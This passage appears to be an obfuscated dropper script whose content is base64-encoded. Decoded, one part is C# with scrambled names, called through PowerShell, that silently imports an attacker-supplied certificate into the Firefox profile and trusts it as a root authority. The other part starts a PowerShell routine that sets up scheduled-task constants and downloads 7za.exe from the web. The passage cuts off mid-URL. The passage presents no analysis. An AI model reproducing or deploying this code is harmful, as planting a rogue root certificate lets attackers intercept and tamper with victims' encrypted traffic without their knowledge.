"YnJhcnkobGliUGF0aCk7CiAgICAgICAgaWYgKG1vZHVsZUhhbmRsZSA9PSBJbnRQdHIuWmVybykKICAgICAgICB7CiAgICAgICAg"+
"ICAgIGludCBsYXN0ZXJyb3IgPSBNYXJzaGFsLkdldExhc3RXaW4zMkVycm9yKCk7CiAgICAgICAgICAgIFN5c3RlbS5Db25zb2xl"+
"LldyaXRlTGluZShTdHJpbmcuRm9ybWF0KCJMYXN0IGVycm9yOiAweHswOlh9IixsYXN0ZXJyb3IpKTsKICAgICAgICAgICAgV2lu"+
"MzJFeGNlcHRpb24gaW5uZXJFeCA9IG5ldyBXaW4zMkV4Y2VwdGlvbihsYXN0ZXJyb3IpOwogICAgICAgICAgICBpbm5lckV4LkRh"+
"dGEuQWRkKCJMYXN0V2luMzJFcnJvciIsIGxhc3RlcnJvcik7CiAgICAgICAgICAgIHRocm93IG5ldyBFeGNlcHRpb24oImNhbid0"+
"IGxvYWQgRExMICIgKyBsaWJQYXRoLCBpbm5lckV4KTsKICAgICAgICB9CiAgICAgICAgcmV0dXJuIG1vZHVsZUhhbmRsZTsKICAg"+
"IH0KCiAgICBbRGxsSW1wb3J0KCJrZXJuZWwzMi5kbGwiKV0KICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBHZXRQcm9j"+
"QWRkcmVzcyhJbnRQdHIgaE1vZHVsZSwgc3RyaW5nIHByb2NlZHVyZU5hbWUpOwoJLy9Db25zdGFudHMKICAgIGNvbnN0IHVpbnQg"+
"TlNTX0lOSVRfUkVBRE9OTFk9MHgxOwogICAgY29uc3QgdWludCBOU1NfSU5JVF9OT0NFUlREQiA9IDB4MjsKICAgIGNvbnN0IHVp"+
"bnQgTlNTX0lOSVRfTk9NT0REQiA9IDB4NDsKICAgIGNvbnN0IHVpbnQgTlNTX0lOSVRfRk9SQ0VPUEVOID0gMHg4OwogICAgY29u"+
"c3QgdWludCBOU1NfSU5JVF9OT1JPT1RJTklUID0gMHgxMDsKICAgIGNvbnN0IHVpbnQgTlNTX0lOSVRfT1BUSU1JWkVTUEFDRSA9"+
"IDB4MjA7CiAgICBjb25zdCB1aW50IE5TU19JTklUX1BLMTFUSFJFQURTQUZFID0gMHg0MDsKICAgIGNvbnN0IHVpbnQgTlNTX0lO"+
"SVRfUEsxMVJFTE9BRCA9IDB4ODA7CiAgICBjb25zdCB1aW50IE5TU19JTklUX05PUEsxMUZJTkFMSVpFID0gMHgxMDA7CiAgICBj"+
"b25zdCB1aW50IE5TU19JTklUX1JFU0VSVkVEID0gMHgyMDA7CiAgICBjb25zdCB1aW50IE5TU19JTklUX0NPT1BFUkFURSA9IE5T"+
"U19JTklUX1BLMTFUSFJFQURTQUZFIHwgTlNTX0lOSVRfUEsxMVJFTE9BRCB8IE5TU19JTklUX05PUEsxMUZJTkFMSVpFIHwgTlNT"+
"X0lOSVRfUkVTRVJWRUQ7CgogICAgY29uc3Qgc3RyaW5nIFNFQ01PRF9EQiA9ICJzZWNtb2QuZGIiOwogICAgLy9TdHJ1Y3R1cmVz"+
"CiAgICBbU3RydWN0TGF5b3V0KExheW91dEtpbmQuU2VxdWVudGlhbCldCiAgICBwdWJsaWMgc3RydWN0IFNFQ0l0ZW0gCiAgICB7"+
"CiAgICAgICAgcHVibGljIHVpbnQgaVR5cGU7CiAgICAgICAgcHVibGljIEludFB0ciBiRGF0YTsKICAgICAgICBwdWJsaWMgdWlu"+
"dCBpRGF0YUxlbjsKICAgIH0KCiAgICBbU3RydWN0TGF5b3V0KExheW91dEtpbmQuU2VxdWVudGlhbCldCiAgICBwcml2YXRlIHN0"+
"cnVjdCBDZXJ0VHJ1c3RzCiAgICB7CiAgICAgICAgcHVibGljIGludCBpU2l0ZTsKICAgICAgICBwdWJsaWMgaW50IGlFbWFpbDsK"+
"ICAgICAgICBwdWJsaWMgaW50IGlTb2Z0OwogICAgfQoKICAgIHByaXZhdGUgZW51bSBTRUNDZXJ0VXNhZ2UKICAgIHsKICAgICAg"+
"ICBjZXJ0VXNhZ2VTU0xDbGllbnQgPSAwLAogICAgICAgIGNlcnRVc2FnZVNTTFNlcnZlciA9IDEsCiAgICAgICAgY2VydFVzYWdl"+
"U1NMU2VydmVyV2l0aFN0ZXBVcCA9IDIsCiAgICAgICAgY2VydFVzYWdlU1NMQ0EgPSAzLAogICAgICAgIGNlcnRVc2FnZUVtYWls"+
"U2lnbmVyID0gNCwKICAgICAgICBjZXJ0VXNhZ2VFbWFpbFJlY2lwaWVudCA9IDUsCiAgICAgICAgY2VydFVzYWdlT2JqZWN0U2ln"+
"bmVyID0gNiwKICAgICAgICBjZXJ0VXNhZ2VVc2VyQ2VydEltcG9ydCA9IDcsCiAgICAgICAgY2VydFVzYWdlVmVyaWZ5Q0EgPSA4"+
"LAogICAgICAgIGNlcnRVc2FnZVByb3RlY3RlZE9iamVjdFNpZ25lciA9IDksCiAgICAgICAgY2VydFVzYWdlU3RhdHVzUmVzcG9u"+
"ZGVyID0gMTAsCiAgICAgICAgY2VydFVzYWdlQW55Q0EgPSAxMQogICAgfQoJW1VubWFuYWdlZEZ1bmN0aW9uUG9pbnRlcihDYWxs"+
"aW5nQ29udmVudGlvbi5DZGVjbCldCiAgICBwcml2YXRlIGRlbGVnYXRlIGludCBGQ1lyeERMU3Ioc3RyaW5nIHNDb25maWdEaXIs"+
"IHN0cmluZyBjZXJ0UHJlZml4LCBzdHJpbmcga2V5UHJlZml4LCBzdHJpbmcgc2VjTW9kTmFtZSwgdWludCBmbGFncyk7CgogICAg"+
"cHJpdmF0ZSBpbnQgU2JpZChzdHJpbmcgc0NvbmZpZ0Rpciwgc3RyaW5nIGNlcnRQcmVmaXgsIHN0cmluZyBrZXlQcmVmaXgsIHN0"+
"cmluZyBzZWNNb2ROYW1lLCB1aW50IGZsYWdzKQogICAgewogICAgICAgIEludFB0ciBwUHJvYyA9IEdldFByb2NBZGRyZXNzKHFB"+
"aVNidG9pbywgIk5TU19Jbml0aWFsaXplIik7CiAgICAgICAgRkNZcnhETFNyIHB0ciA9IChGQ1lyeERMU3IpTWFyc2hhbC5HZXRE"+
"ZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcihwUHJvYywgdHlwZW9mKEZDWXJ4RExTcikpOwogICAgICAgIHJldHVybiBwdHIoc0Nv"+
"bmZpZ0RpciwgY2VydFByZWZpeCwga2V5UHJlZml4LCBzZWNNb2ROYW1lLCBmbGFncyk7CiAgICB9CgogICAgW1VubWFuYWdlZEZ1"+
"bmN0aW9uUG9pbnRlcihDYWxsaW5nQ29udmVudGlvbi5DZGVjbCldCiAgICBwcml2YXRlIGRlbGVnYXRlIEludFB0ciBZTWUoKTsK"+
"ICAgIHByaXZhdGUgSW50UHRyIHFIbGh4UEdSZSgpCiAgICB7CiAgICAgICAgSW50UHRyIHBQcm9jID0gR2V0UHJvY0FkZHJlc3Mo"+
"cUFpU2J0b2lvLCAiQ0VSVF9HZXREZWZhdWx0Q2VydERCIik7CiAgICAgICAgWU1lIHB0ciA9IChZTWUpTWFyc2hhbC5HZXREZWxl"+
"Z2F0ZUZvckZ1bmN0aW9uUG9pbnRlcihwUHJvYywgdHlwZW9mKFlNZSkpOwogICAgICAgIHJldHVybiBwdHIoKTsKICAgIH0KCiAg"+
"ICBbVW5tYW5hZ2VkRnVuY3Rpb25Qb2ludGVyKENhbGxpbmdDb252ZW50aW9uLkNkZWNsKV0KICAgIHByaXZhdGUgZGVsZWdhdGUg"+
"SW50UHRyIFJjV0JjVEUoKTsKICAgIHByaXZhdGUgSW50UHRyIFJrdEVJTHV5U0goKQogICAgewogICAgICAgIEludFB0ciBwUHJv"+
"YyA9IEdldFByb2NBZGRyZXNzKHFBaVNidG9pbywgIk5TU19TaHV0ZG93biIpOwogICAgICAgIFJjV0JjVEUgcHRyID0gKFJjV0Jj"+
"VEUpTWFyc2hhbC5HZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcihwUHJvYywgdHlwZW9mKFJjV0JjVEUpKTsKICAgICAgICBy"+
"ZXR1cm4gcHRyKCk7CiAgICB9CgogICAgW1VubWFuYWdlZEZ1bmN0aW9uUG9pbnRlcihDYWxsaW5nQ29udmVudGlvbi5DZGVjbCld"+
"CiAgICBwcml2YXRlIGRlbGVnYXRlIGludCBmRm90bXJLKEludFB0ciBjZXJ0ZGIsIGludCB1c2FnZSwgdWludCBuY2VydHMsIHJl"+
"ZiBTRUNJdGVtW10gZGVyQ2VydHMsIHJlZiBJbnRQdHIgcmV0Q2VydHMsIHVpbnQga2VlcENlcnRzLCB1aW50IGNhT25seSwgSW50"+
"UHRyIG5pY2tuYW1lKTsKICAgIHByaXZhdGUgaW50IHZRWUMoSW50UHRyIGNlcnRkYiwgaW50IHVzYWdlLCB1aW50IG5jZXJ0cywg"+
"cmVmIFNFQ0l0ZW1bXSBkZXJDZXJ0cywgcmVmIEludFB0ciByZXRDZXJ0cywgdWludCBrZWVwQ2VydHMsIHVpbnQgY2FPbmx5LCBJ"+
"bnRQdHIgbmlja25hbWUpCiAgICB7CiAgICAgICAgSW50UHRyIHBQcm9jID0gR2V0UHJvY0FkZHJlc3MocUFpU2J0b2lvLCAiQ0VS"+
"VF9JbXBvcnRDZXJ0cyIpOwogICAgICAgIGZGb3RtcksgcHRyID0gKGZGb3RtckspTWFyc2hhbC5HZXREZWxlZ2F0ZUZvckZ1bmN0"+
"aW9uUG9pbnRlcihwUHJvYywgdHlwZW9mKGZGb3RtckspKTsKICAgICAgICByZXR1cm4gcHRyKGNlcnRkYiwgdXNhZ2UsIG5jZXJ0"+
"cywgcmVmIGRlckNlcnRzLCByZWYgcmV0Q2VydHMsIGtlZXBDZXJ0cywgY2FPbmx5LCBuaWNrbmFtZSk7CiAgICB9CgogICAgcHJp"+
"dmF0ZSBkZWxlZ2F0ZSBpbnQgSExHKEludFB0ciBjZXJ0ZGIsIEludFB0ciBjZXJ0LCByZWYgQ2VydFRydXN0cyB0cnVzdCk7CiAg"+
"ICBwcml2YXRlIGludCBLSW5ReWooSW50UHRyIGNlcnRkYiwgSW50UHRyIGNlcnQsIHJlZiBDZXJ0VHJ1c3RzIHRydXN0KQogICAg"+
"ewogICAgICAgIEludFB0ciBwUHJvYyA9IEdldFByb2NBZGRyZXNzKHFBaVNidG9pbywgIkNFUlRfQ2hhbmdlQ2VydFRydXN0Iik7"+
"CiAgICAgICAgSExHIHB0ciA9IChITEcpTWFyc2hhbC5HZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcihwUHJvYywgdHlwZW9m"+
"KEhMRykpOwogICAgICAgIHJldHVybiBwdHIoY2VydGRiLCBjZXJ0LCByZWYgdHJ1c3QpOwogICAgfQoKICAgIFtVbm1hbmFnZWRG"+
"dW5jdGlvblBvaW50ZXIoQ2FsbGluZ0NvbnZlbnRpb24uQ2RlY2wpXQogICAgcHVibGljIGRlbGVnYXRlIGludCBMa3lsbXlMbShJ"+
"bnRQdHIgY2VydCwgdWludCBuY2VydHMpOwogICAgcHJpdmF0ZSBpbnQgaG9SS3VBbVZUKEludFB0ciBjZXJ0LCB1aW50IG5jZXJ0"+
"cykKICAgIHsKICAgICAgICBJbnRQdHIgcFByb2MgPSBHZXRQcm9jQWRkcmVzcyhxQWlTYnRvaW8sICJDRVJUX0Rlc3Ryb3lDZXJ0"+
"QXJyYXkiKTsKICAgICAgICBMa3lsbXlMbSBwdHIgPSAoTGt5bG15TG0pTWFyc2hhbC5HZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9p"+
"bnRlcihwUHJvYywgdHlwZW9mKExreWxteUxtKSk7CiAgICAgICAgcmV0dXJuIHB0cihjZXJ0LCBuY2VydHMpOwogICAgfQoKCXBy"+
"aXZhdGUgSW50UHRyIHFBaVNidG9pbyA9IEludFB0ci5aZXJvOwoJCglwdWJsaWMgQm9vbGVhbiB5SnVXeGRseXVOKFN0cmluZyBz"+
"Q2VydCl7CiAgICAgICAgU3lzdGVtLkNvbnNvbGUuV3JpdGVMaW5lKCJFaGRtSEdtTEJ6TVhLbCBTdGFydCIpOwoJCVN0cmluZyBz"+
"UHJvZmlsZSA9IEdldFByb2ZpbGUoKTsKICAgICAgICBpZiAoU3RyaW5nLklzTnVsbE9yRW1wdHkoc1Byb2ZpbGUpKQogICAgICAg"+
"IHsKICAgICAgICAgICAgU3lzdGVtLkNvbnNvbGUuV3JpdGVMaW5lKCJQcm9maWxlIG5vdCBmb3VuZCIpOwogICAgICAgICAgICBy"+
"ZXR1cm4gZmFsc2U7CiAgICAgICAgfQogICAgICAgIFN5c3RlbS5Db25zb2xlLldyaXRlTGluZSgiUHJvZmlsZSBwYXRoPSIrc1By"+
"b2ZpbGUpOwogICAgICAgIGJ5dGVbXSBiQ2VydCA9IEdldENlcnRBc0J5dGVBcnJheShzQ2VydCk7CgkJSW50UHRyIGlwQ2VydCA9"+
"IE1hcnNoYWwuQWxsb2NIR2xvYmFsKGJDZXJ0Lkxlbmd0aCk7CgkJdHJ5CiAgICAgICAgewogICAgICAgICAgICBEaXJlY3RvcnlJ"+
"bmZvIGRpSW5zdGFsbFBhdGggPSBHZXRJUCgpOwogICAgICAgICAgICBTdHJpbmcgc0N1cnJlbnREaXJlY3RvcnkgPSBEaXJlY3Rv"+
"cnkuR2V0Q3VycmVudERpcmVjdG9yeSgpOwogICAgICAgICAgICBEaXJlY3RvcnkuU2V0Q3VycmVudERpcmVjdG9yeShkaUluc3Rh"+
"bGxQYXRoLkZ1bGxOYW1lKTsKICAgICAgICAgICAgU3lzdGVtLkNvbnNvbGUuV3JpdGVMaW5lKCJJbnN0YWxsIHBhdGg9IitkaUlu"+
"c3RhbGxQYXRoLkZ1bGxOYW1lKTsKICAgICAgICAgICAgZm9yZWFjaChGaWxlSW5mbyBmaURsbCBpbiBkaUluc3RhbGxQYXRoLkdl"+
"dEZpbGVzKCIqLmRsbCIpKQogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICBpZiAoZmlEbGwuTmFtZS5FcXVhbHMoImJyZWFr"+
"cGFkaW5qZWN0b3IuZGxsIikpIGNvbnRpbnVlOwogICAgICAgICAgICAgICAgWHVYKGZpRGxsLkZ1bGxOYW1lKTsKICAgICAgICAg"+
"ICAgfQogICAgICAgICAgICBxQWlTYnRvaW8gPSBYdVgoZGlJbnN0YWxsUGF0aC5GdWxsTmFtZSArICJcXG5zczMuZGxsIik7CiAg"+
"ICAgICAgICAgIGlmIChxQWlTYnRvaW8uRXF1YWxzKEludFB0ci5aZXJvKSkKICAgICAgICAgICAgewogICAgICAgICAgICAgICAg"+
"U3lzdGVtLkNvbnNvbGUuV3JpdGVMaW5lKCJGaXJlZm94IGluc3RhbGwgZGlyZWN0b3J5IG5vdCBmb3VuZCIpOwogICAgICAgICAg"+
"ICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgICAgICB9CiAgICAgICAgICAgIERpcmVjdG9yeS5TZXRDdXJyZW50RGlyZWN0b3J5"+
"KHNDdXJyZW50RGlyZWN0b3J5KTsKICAgICAgICAgICAgLy9Jbml0IGNlcnQKICAgICAgICAgICAgTWFyc2hhbC5Db3B5KGJDZXJ0"+
"LCAwLCBpcENlcnQsIGJDZXJ0Lkxlbmd0aCk7CiAgICAgICAgICAgIFNFQ0l0ZW0gQ2VydEl0ZW0gPSBuZXcgU0VDSXRlbSgpOwog"+
"ICAgICAgICAgICBDZXJ0SXRlbS5pVHlwZSA9IDM7CiAgICAgICAgICAgIENlcnRJdGVtLmJEYXRhID0gaXBDZXJ0OwogICAgICAg"+
"ICAgICBDZXJ0SXRlbS5pRGF0YUxlbiA9ICh1aW50KWJDZXJ0Lkxlbmd0aDsKICAgICAgICAgICAgU0VDSXRlbVtdIGFDZXJ0SXRl"+
"bSA9IG5ldyBTRUNJdGVtWzFdOwogICAgICAgICAgICBhQ2VydEl0ZW1bMF0gPSBDZXJ0SXRlbTsKCiAgICAgICAgICAgIENlcnRU"+
"cnVzdHMgQ2VydFRydXN0ID0gbmV3IENlcnRUcnVzdHMoKTsKICAgICAgICAgICAgQ2VydFRydXN0LmlTaXRlID0gMHgxMDsKICAg"+
"ICAgICAgICAgQ2VydFRydXN0LmlFbWFpbCA9IDB4MTA7CiAgICAgICAgICAgIENlcnRUcnVzdC5pU29mdCA9IDB4MTA7CiAgICAg"+
"ICAgICAgIFN5c3RlbS5Db25zb2xlLldyaXRlTGluZSgiSW5pdCBjZXJ0IE9LIik7CiAgICAgICAgICAgIC8vRW5kIGluaXQgY2Vy"+
"dAogICAgICAgICAgICBpbnQgc3RhdHVzID0gU2JpZChzUHJvZmlsZSwgIiIsICIiLCBTRUNNT0RfREIsIE5TU19JTklUX09QVElN"+
"SVpFU1BBQ0UpOwogICAgICAgICAgICBpZiAoc3RhdHVzICE9IE9HZSkKICAgICAgICAgICAgewogICAgICAgICAgICAgICAgU3lz"+
"dGVtLkNvbnNvbGUuV3JpdGVMaW5lKFN0cmluZy5Gb3JtYXQoIk5TU19Jbml0UmVhZFdyaXRlIEVSUk9SLiBTdGF0dXM6IDB4ezA6"+
"WH07TGFzdCBlcnJvcjogMHh7MDpYfSIsIHN0YXR1cywgTWFyc2hhbC5HZXRMYXN0V2luMzJFcnJvcigpKSk7CiAgICAgICAgICAg"+
"ICAgICByZXR1cm4gZmFsc2U7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgSW50UHRyIGJkID0gcUhsaHhQR1JlKCk7CiAgICAg"+
"ICAgICAgIGlmIChiZCA9PSBJbnRQdHIuWmVybykKICAgICAgICAgICAgewogICAgICAgICAgICAgICAgU3lzdGVtLkNvbnNvbGUu"+
"V3JpdGVMaW5lKCJDRVJUX0dldERlZmF1bHRDZXJ0REIgRmFpbGVkIik7CiAgICAgICAgICAgICAgICBSa3RFSUx1eVNIKCk7CiAg"+
"ICAgICAgICAgICAgICByZXR1cm4gZmFsc2U7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgU3lzdGVtLkNvbnNvbGUuV3JpdGVM"+
"aW5lKCJDRVJUX0dldERlZmF1bHRDZXJ0REIgT0siKTsKICAgICAgICAgICAgSW50UHRyIENlcnRUb0ltcG9ydCA9IG5ldyBJbnRQ"+
"dHIoKTsKICAgICAgICAgICAgSW50UHRyW10gYUNlcnRUb0ltcG9ydCA9IG5ldyBJbnRQdHJbMV07CiAgICAgICAgICAgIHN0YXR1"+
"cyA9IHZRWUMoYmQsIDExLCAxLCByZWYgYUNlcnRJdGVtLCByZWYgQ2VydFRvSW1wb3J0LCAxLCAwLCBJbnRQdHIuWmVybyk7CiAg"+
"ICAgICAgICAgIGlmIChzdGF0dXMgIT0gT0dlKQogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICBTeXN0ZW0uQ29uc29sZS5X"+
"cml0ZUxpbmUoU3RyaW5nLkZvcm1hdCgiQ0VSVF9JbXBvcnRDZXJ0cyBFUlJPUi4gU3RhdHVzOiAweHswOlh9O0xhc3QgZXJyb3I6"+
"IDB4ezA6WH0iLCBzdGF0dXMsIE1hcnNoYWwuR2V0TGFzdFdpbjMyRXJyb3IoKSkpOwogICAgICAgICAgICAgICAgUmt0RUlMdXlT"+
"SCgpOwogICAgICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgICAgICB9CiAgICAgICAgICAgIFN5c3RlbS5Db25zb2xl"+
"LldyaXRlTGluZSgiQ0VSVF9JbXBvcnRDZXJ0cyBPSyIpOwogICAgICAgICAgICBNYXJzaGFsLkNvcHkoQ2VydFRvSW1wb3J0LCBh"+
"Q2VydFRvSW1wb3J0LCAwLCAxKTsKICAgICAgICAgICAgc3RhdHVzID0gS0luUXlqKGJkLCBhQ2VydFRvSW1wb3J0WzBdLCByZWYg"+
"Q2VydFRydXN0KTsKICAgICAgICAgICAgaWYgKCBzdGF0dXMgIT0gT0dlKSAKICAgICAgICAgICAgewogICAgICAgICAgICAgICAg"+
"U3lzdGVtLkNvbnNvbGUuV3JpdGVMaW5lKFN0cmluZy5Gb3JtYXQoIkNFUlRfQ2hhbmdlQ2VydFRydXN0IEVSUk9SLiBTdGF0dXM6"+
"IDB4ezA6WH07TGFzdCBlcnJvcjogMHh7MDpYfSIsIHN0YXR1cywgTWFyc2hhbC5HZXRMYXN0V2luMzJFcnJvcigpKSk7CiAgICAg"+
"ICAgICAgICAgICBSa3RFSUx1eVNIKCk7CiAgICAgICAgICAgICAgICByZXR1cm4gZmFsc2U7CiAgICAgICAgICAgIH07CiAgICAg"+
"ICAgICAgIFN5c3RlbS5Db25zb2xlLldyaXRlTGluZSgiQ0VSVF9DaGFuZ2VDZXJ0VHJ1c3QgT0siKTsKICAgICAgICAgICAgaG9S"+
"S3VBbVZUKENlcnRUb0ltcG9ydCwgMSk7CiAgICAgICAgICAgIFN5c3RlbS5Db25zb2xlLldyaXRlTGluZSgiQWRkIGNlcnQgT0si"+
"KTsKICAgICAgICB9CiAgICAgICAgY2F0Y2ggKEV4Y2VwdGlvbil7fQogICAgICAgIGZpbmFsbHkKICAgICAgICB7CiAgICAgICAg"+
"ICAgIFJrdEVJTHV5U0goKTsKICAgICAgICB9CgkJcmV0dXJuIHRydWU7Cgl9Cglwcml2YXRlIFN0cmluZyBHZXRQcm9maWxlKCkK"+
"ICAgIHsKICAgICAgICBTdHJpbmcgRkZQcm9maWxlID0gUGF0aC5Db21iaW5lKEVudmlyb25tZW50LkdldEVudmlyb25tZW50VmFy"+
"aWFibGUoIkFQUERBVEEiKSwgQCJNb3ppbGxhXEZpcmVmb3hcUHJvZmlsZXMiKTsKICAgICAgICBpZiAoRGlyZWN0b3J5LkV4aXN0"+
"cyhGRlByb2ZpbGUpKQogICAgICAgIHsKICAgICAgICAgICAgaWYgKERpcmVjdG9yeS5HZXREaXJlY3RvcmllcyhGRlByb2ZpbGUs"+
"ICIqLmRlZmF1bHQiKS5MZW5ndGggPiAwKQogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICByZXR1cm4gRGlyZWN0b3J5Lkdl"+
"dERpcmVjdG9yaWVzKEZGUHJvZmlsZSwgIiouZGVmYXVsdCIpWzBdOwogICAgICAgICAgICB9CiAgICAgICAgfQogICAgICAgIHJl"+
"dHVybiAiIjsKICAgIH0KCXB1YmxpYyBieXRlW10gR2V0Q2VydEFzQnl0ZUFycmF5KFN0cmluZyBzQ2VydCkKICAgIHsKICAgICAg"+
"ICB0cnkKICAgICAgICB7CiAgICAgICAgICAgIHJldHVybiBDb252ZXJ0LkZyb21CYXNlNjRTdHJpbmcoc0NlcnQpOwogICAgICAg"+
"IH0KICAgICAgICBjYXRjaCAoRXhjZXB0aW9uKXt9CiAgICAgICAgcmV0dXJuIG51bGw7CiAgICB9Cglwcml2YXRlIERpcmVjdG9y"+
"eUluZm8gR2V0SVAoKQogICAgewogICAgICAgIERpcmVjdG9yeUluZm8gZnAgPSBudWxsOwogICAgICAgIC8vIGdldCBmaXJlZm94"+
"IHBhdGggZnJvbSByZWdpc3RyeQogICAgICAgIC8vIHdlJ2xsIHNlYXJjaCB0aGUgMzJiaXQgaW5zdGFsbCBsb2NhdGlvbgogICAg"+
"ICAgIFJlZ2lzdHJ5S2V5IGxvY2FsTWFjaGluZTEgPSBSZWdpc3RyeS5Mb2NhbE1hY2hpbmUuT3BlblN1YktleShAIlNPRlRXQVJF"+
"XE1vemlsbGFcTW96aWxsYSBGaXJlZm94IiwgZmFsc2UpOwogICAgICAgIC8vIGFuZCBsZXRzIHRyeSB0aGUgNjRiaXQgaW5zdGFs"+
"bCBsb2NhdGlvbiBqdXN0IGluIGNhc2UKICAgICAgICBSZWdpc3RyeUtleSBsb2NhbE1hY2hpbmUyID0gUmVnaXN0cnkuTG9jYWxN"+
"YWNoaW5lLk9wZW5TdWJLZXkoQCJTT0ZUV0FSRVxXb3c2NDMyTm9kZVxNb3ppbGxhXE1vemlsbGEgRmlyZWZveCIsIGZhbHNlKTsK"+
"CiAgICAgICAgaWYgKGxvY2FsTWFjaGluZTEgIT0gbnVsbCkKICAgICAgICB7CiAgICAgICAgICAgIHRyeQogICAgICAgICAgICB7"+
"CiAgICAgICAgICAgICAgICBzdHJpbmdbXSBpbnN0YWxsZWRWZXJzaW9ucyA9IGxvY2FsTWFjaGluZTEuR2V0U3ViS2V5TmFtZXMo"+
"KTsKICAgICAgICAgICAgICAgIC8vIHdlJ2xsIHRha2UgdGhlIGZpcnN0IGluc3RhbGxlZCB2ZXJzaW9uLCBwZW9wbGUgbm9ybWFs"+
"bHkgb25seSBoYXZlIG9uZQogICAgICAgICAgICAgICAgaWYgKGluc3RhbGxlZFZlcnNpb25zLkxlbmd0aCA9PSAwKQogICAgICAg"+
"ICAgICAgICAgICAgIHRocm93IG5ldyBJbmRleE91dE9mUmFuZ2VFeGNlcHRpb24oIk5vIGluc3RhbGxzIG9mIGZpcmVmb3ggcmVj"+
"b3JkZWQgaW4gaXRzIGtleS4iKTsKCiAgICAgICAgICAgICAgICBSZWdpc3RyeUtleSBtYWluSW5zdGFsbCA9IGxvY2FsTWFjaGlu"+
"ZTEuT3BlblN1YktleShpbnN0YWxsZWRWZXJzaW9uc1swXSk7CgogICAgICAgICAgICAgICAgLy8gZ2V0IGluc3RhbGwgZGlyZWN0"+
"b3J5CiAgICAgICAgICAgICAgICBzdHJpbmcgaW5zdGFsbFN0cmluZyA9IChzdHJpbmcpbWFpbkluc3RhbGwuT3BlblN1YktleSgi"+
"TWFpbiIpLkdldFZhbHVlKCJJbnN0YWxsIERpcmVjdG9yeSIsIG51bGwpOwoKICAgICAgICAgICAgICAgIGlmIChpbnN0YWxsU3Ry"+
"aW5nID09IG51bGwpCiAgICAgICAgICAgICAgICAgICAgdGhyb3cgbmV3IE51bGxSZWZlcmVuY2VFeGNlcHRpb24oIkluc3RhbGwg"+
"c3RyaW5nIHdhcyBudWxsIik7CgogICAgICAgICAgICAgICAgZnAgPSBuZXcgRGlyZWN0b3J5SW5mbyhpbnN0YWxsU3RyaW5nKTsK"+
"ICAgICAgICAgICAgfQogICAgICAgICAgICBjYXRjaCAoRXhjZXB0aW9uKQogICAgICAgICAgICB7CiAgICAgICAgICAgIH0KICAg"+
"ICAgICB9CiAgICAgICAgZWxzZSBpZiAobG9jYWxNYWNoaW5lMiAhPSBudWxsKQogICAgICAgIHsKICAgICAgICAgICAgdHJ5CiAg"+
"ICAgICAgICAgIHsKICAgICAgICAgICAgICAgIHN0cmluZ1tdIGluc3RhbGxlZFZlcnNpb25zID0gbG9jYWxNYWNoaW5lMi5HZXRT"+
"dWJLZXlOYW1lcygpOwogICAgICAgICAgICAgICAgLy8gd2UnbGwgdGFrZSB0aGUgZmlyc3QgaW5zdGFsbGVkIHZlcnNpb24sIHBl"+
"b3BsZSBub3JtYWxseSBvbmx5IGhhdmUgb25lCiAgICAgICAgICAgICAgICBpZiAoaW5zdGFsbGVkVmVyc2lvbnMuTGVuZ3RoID09"+
"IDApCiAgICAgICAgICAgICAgICAgICAgdGhyb3cgbmV3IEluZGV4T3V0T2ZSYW5nZUV4Y2VwdGlvbigiTm8gaW5zdGFsbHMgb2Yg"+
"ZmlyZWZveCByZWNvcmRlZCBpbiBpdHMga2V5LiIpOwoKICAgICAgICAgICAgICAgIFJlZ2lzdHJ5S2V5IG1haW5JbnN0YWxsID0g"+
"bG9jYWxNYWNoaW5lMi5PcGVuU3ViS2V5KGluc3RhbGxlZFZlcnNpb25zWzBdKTsKCiAgICAgICAgICAgICAgICAvLyBnZXQgaW5z"+
"dGFsbCBkaXJlY3RvcnkKICAgICAgICAgICAgICAgIHN0cmluZyBpbnN0YWxsU3RyaW5nID0gKHN0cmluZyltYWluSW5zdGFsbC5P"+
"cGVuU3ViS2V5KCJNYWluIikuR2V0VmFsdWUoIkluc3RhbGwgRGlyZWN0b3J5IiwgbnVsbCk7CgogICAgICAgICAgICAgICAgaWYg"+
"KGluc3RhbGxTdHJpbmcgPT0gbnVsbCkKICAgICAgICAgICAgICAgICAgICB0aHJvdyBuZXcgTnVsbFJlZmVyZW5jZUV4Y2VwdGlv"+
"bigiSW5zdGFsbCBzdHJpbmcgd2FzIG51bGwiKTsKICAgICAgICAgICAgICAgIGZwID0gbmV3IERpcmVjdG9yeUluZm8oaW5zdGFs"+
"bFN0cmluZyk7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgY2F0Y2ggKEV4Y2VwdGlvbikKICAgICAgICAgICAgewogICAgICAg"+
"ICAgICB9CiAgICAgICAgfQogICAgICAgIHJldHVybiBmcDsKICAgIH0KfQoiQDsKW0VoZG1IR21MQnpNWEtsXTo6TW1NYVJ1d3Vo"+
"QlJaQ1IoKS55SnVXeGRseXVOKCIlQ0VSVCUiKTsKfQpMR0N4d0JNSGFr",
    Ghq: "JFNIX1RZUEVfU0NIRURVTEVEX1RBU0s9MTsKJFNIX1RZUEVfVEFTS19TQ0hFRFVMRVI9MjsKJHNjaGVkdWxlclR5cGU9JFNIX1RZUEVfU0NIRURVTEVEX1RBU0s7CmZ1bmN0aW9uIEZWUkNsc2dnTVJBWgp7CnBhcmFtKFtzdHJpbmddJHppcGZpbGUsIFtzdHJpbmdd"+
"JGRlc3RpbmF0aW9uKTsKJDd6ID0gSm9pbi1QYXRoICRlbnY6QUxMVVNFUlNQUk9GSUxFICc3emEuZXhlJzsKaWYgKC1OT1QgKFRlc3QtUGF0aCAkN3opKXsKVHJ5CnsKKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgnaHR0cHM6"+
